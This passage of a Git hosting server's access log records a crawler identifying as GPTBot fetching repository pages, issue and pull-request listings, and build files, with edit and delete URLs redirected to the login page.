AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3" -[17/Feb/2026:19:39:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:39:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/install.sh" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/install.sh" -[17/Feb/2026:19:39:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/install.sh" -[17/Feb/2026:19:39:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/install.sh" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/install.sh" -[17/Feb/2026:19:39:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/install.sh" -[17/Feb/2026:19:39:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/install.sh" [Client 74.7.227.38] [Length 9835] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/install.sh" -[17/Feb/2026:19:39:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/install.sh?display=rendered" [Client 74.7.227.38] [Length 11123] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/install.sh" -[17/Feb/2026:19:39:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/install.sh?display=source" [Client 74.7.227.38] [Length 14992] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/install.sh" -[17/Feb/2026:19:39:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/install.sh" [Client 74.7.227.38] [Length 3545] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/install.sh" -[17/Feb/2026:19:39:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/install.sh" [Client 74.7.227.38] [Length 15348] [Gzip 8.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/install.sh" -[17/Feb/2026:19:39:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/install.sh" [Client 74.7.227.38] [Length 983] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/install.sh" -[17/Feb/2026:19:39:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:39:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:39:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:39:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9985] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:39:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10147] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:19:39:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&project=-1&state=open&type=all" -[17/Feb/2026:19:39:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=open&type=all" -[17/Feb/2026:19:39:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/.vscode/c_cpp_properties.json?display=source" [Client 74.7.227.38] [Length 11583] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:19:39:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/.vscode/c_cpp_properties.json?display=source" [Client 74.7.227.38] [Length 11585] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:19:39:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/install.sh" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/install.sh" -[17/Feb/2026:19:39:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/install.sh" -[17/Feb/2026:19:39:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/install.sh" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/install.sh" -[17/Feb/2026:19:39:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/install.sh" -[17/Feb/2026:19:39:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9991] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:39:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:39:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:39:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10061] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" -[17/Feb/2026:19:39:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" -[17/Feb/2026:19:39:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" -[17/Feb/2026:19:39:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 11154] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" -[17/Feb/2026:19:39:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 69558] [Gzip 17.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc" -[17/Feb/2026:19:39:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 11129] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" -[17/Feb/2026:19:39:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 71123] [Gzip 17.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc" -[17/Feb/2026:19:39:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 44333] [Gzip 15.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" -[17/Feb/2026:19:39:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:39:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&project=-1&state=closed&type=all" -[17/Feb/2026:19:39:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&project=-1&state=closed&type=all" -[17/Feb/2026:19:39:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:39:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:39:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&project=-1&state=open&type=all" -[17/Feb/2026:19:39:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:39:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:39:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:39:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9967] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:39:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:39:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:39:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9983] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:19:39:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10156] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:39:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:39:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:39:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11366] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:39:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11364] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:39:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11155] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:39:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11365] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:39:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11156] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:39:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10067] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:39:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:39:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr 